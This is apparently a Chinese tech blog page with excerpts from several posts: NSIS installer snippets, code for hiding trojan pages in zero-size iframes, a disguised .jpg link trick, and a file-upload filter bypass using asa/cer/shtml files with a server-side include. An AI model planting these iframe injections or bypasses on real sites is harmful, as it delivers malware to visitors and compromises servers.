小健博客网络技术综合大全

     用NSIS软件制作安装包时总会用到那么几个常用的代码，正因为常用到，自己脑袋又不好记不住，所以就一一记录下来，时间一长自然也就成好多条了，贴出来与大家分享一下吧。

1.如何运行一个批处理文件 .bat
注：xiaojian.bat为你的文件名
ExecWait "xiaojian.bat"
不显示黑框框
nsExec::Exec "xiaojian.bat"

...

      经常去一些网页看到被挂马，或者有时候自己的网站也被挂了马，而且在网吧上网的时候被ARP网页文件头挂马，基本上都用到以下的代码，大家可以了解一下，了解清楚后，自然就知道怎么认识，怎么清除，怎么防范。

一:框架挂马

<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马

首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
...

      今天发现我的网址站经常被缓存，就算首页更新了，被缓存的IE也不更新，我很郁闷，于是上网搜了一下解决方法，加一个禁止网页缓存的代码即可了。

但是要先加貌似才有用，比如已经缓存了你的网页，你再加也没用了，已经缓存过的IE是访问不到你已经更新过的网页了。

HTML:
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
...

     如果别人发一个图片网址链接给你: http://www.xxx.com/mm.jpg  我想一般懂点电脑知识的人还是敢访问的吧。因为它的后缀是JPG，不可能是木马的，结果却是大大的杯具了。

正因为懂点知识，所以才会上当，如果直接是个小白，管你什么链接发来，直接不敢点击打开。

漏洞代码是：

<html>
<iframe src="网页木马地址" width="0" height="0" frameborder="0"></iframe>
...

      我们在得到网站的后台，或者直接得到一个上传的界面时，有时候程序会直接禁止上传asp扩展的文件，这个时候我们可以上传 asa,cer,cdx这些格式的，或者上传aspx,php这些格式的木马，不过我想这些大家基本上都知道了，今天讲另一个方法，那就是stm，shtm，shtml这些格式的利用，新建一个1.shtml 内容为：

<!--#ECHO var="ALL_HTTP"--><br>
...

   今天一朋友发来一个MTV给我看了一下，太感动了，对里面情节很有感触，因为我也是刚买房的，全部家产买的，而且还欠银行26万，我父亲也是农民工，感觉现在买个房子真的是太难太难了。啥也不说了，大家看MTV吧，看完一定要转，一定要让那些政府官员看到。